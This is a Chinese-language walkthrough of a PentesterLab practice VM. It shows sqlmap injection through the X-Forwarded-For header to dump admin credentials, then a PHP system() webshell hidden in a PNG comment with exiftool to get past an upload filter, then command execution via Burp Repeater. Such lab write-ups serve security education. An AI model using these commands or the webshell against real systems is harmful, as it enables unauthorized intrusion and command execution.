CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 安全资讯
  3. 正文

Pentester Lab课程通关流程详解

2017年2月20日 1421点热度 0人点赞 0条评论

前言

今天实验所涉及到的环境可以从这里进行下载,在VM ware中安装下载的iso镜像并启动。本次实验难度适中,挑战的内容分别为获取管理后台权限以及上传webshell。

任务一:获取管理后台权限

启动Kali Linux,打开终端然后键入netdiscover命令对网络进行扫描。如以下截图所示,我们的目标IP为192.168.1.102。接下来我们在浏览器下打开它。

当你在浏览器中键入目标IP并回车,你会看到一个标题为My Awesome Photoblog的web页面。在右上角包含了一些标签:home; test; ruxcon; 2010; all pictures; admin。我们点击test看看。

给定的URL:192.168.1.102/cat.php?id=1将对ID 1进行SQL查询,现在我们尝试看下该URL是否存在SQL注入漏洞。先用满大街都在讲的在URL后面添加单引号,即192.168.1.102/cat.php?id=1’,页面返回正常。

接下来祭出神器nikto看看是否存在其他漏洞,在终端键入以下命令:

Nikto –h 192.168.1.102

注意下面截图中高亮部分,从扫描结果来看网页没有设置X-Content-Type-Option数据头。

紧接着使用acunetix对目标进行扫描,还真就发现存在高危的SQL盲注漏洞。也就是说我们可以通过SQL注入进行攻击。

使用以下sqlmap命令对目标进行SQL盲注:

sqlmap -u “http://192.168.1.102/cat.php?id=1″ –headers=”X-Forwarded-For: *” –dbs –batch

现在尝试对数据头进行SQL注入;目标应用可能是使用X-Forwarded-For数据头以运行一个反向代理。

我们的假设是正确的,上述数据头存在SQL注入,之后我们获得一个名为photoblog的数据库。

通过以下命令获取photoblog数据库中的全部数据:

sqlmap -u “http://192.168.1.102/cat.php?id=1″ –headers=”X-Forwarded-For: *” –D photoblog –dump-all –batch

第一个任务便是获取后台管理员访问权限,也即管理员账户和密码。通过sqlmap命令我们获得名为admin,密码为P4ssw0rd的管理用户。

尝试使用上面获得的帐号密码登录后台,在浏览器中再次打开目标IP192.168.1.102,单击右上角的admin标签,然后键入用户名admin,密码P4ssw0rd

恭喜!第一个任务完成

任务二:上传webshell

接下来的任务便是上传webshell。在管理员后台你会注意到一个名为新增图片的链接,我们单击然后上传图片。

通过新增选项,我们尝试上传我们的webshell。

尝试直接上传.php后缀的恶意PHP文件;然后使用双后缀.php.jpg;大小写敏感的PHP,pHP都以失败告终,最终返回以下页面:

之后我使用exiftool将恶意代码隐藏在png图片中。在这之前你需要下载一张图片保存在桌面,然后通过在文本文档输入以下恶意代码来构造一个命令注入漏洞,将其另存为raj.php文件。

<?php $cmd=$GET[‘cmd’]; system($cmd); ?>

键入以下命令,使用exiftool将PHP恶意代码隐藏到png图片中:

Cd Desktop

Exiftool “-comment<=raj.php” 1.png

Exiftool 1.png

从下面的截图中你就看出来,我桌面上一共有3个文件,一个是名为raj.php的php文件,另外两个分别是从网上下载的1.png original,以及包含我们恶意代码的1.png。

使用包含恶意代码的1.png进行上传

我们的恶意文件成功上传,名为webshell php的新增行就包含了我们的后门raj.php,点击webshell php看看

这就是我们的恶意图片,单击右键选择查看图片标签:

之后该图片会在新的标签页打开,希望你没有忘记这张图片是隐藏有命令注入恶意代码的

通过在URL后面加上/cmd.php?cmd=ls/etc,尝试执行命令。从截图中你可以看到该页面是进过加密的

此路不通,那我们就使用burp suite中的转发功能(repeater)来执行命令。打开burp suite,对浏览器设置代理,然后在浏览器中打开图片页面。

通过burp suit抓取cookies,将这些拦截到的数据发送给转发选项(repeater)

将header选项中的/show.php?id=4改为/admin/uploads/1484502823.png/cmd.php?cmd=ls,然后单击Go选项发送请求获得响应,最后你会在响应信息中发现使用ls命令的痕迹。

Great!!! 本次试验完成

*参考来源:hackingarticles,FB小编鸢尾编译,转载请注明来自FreeBuf(FreeBuf.COM)0day

标签: 暂无
最后更新:2017年2月20日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me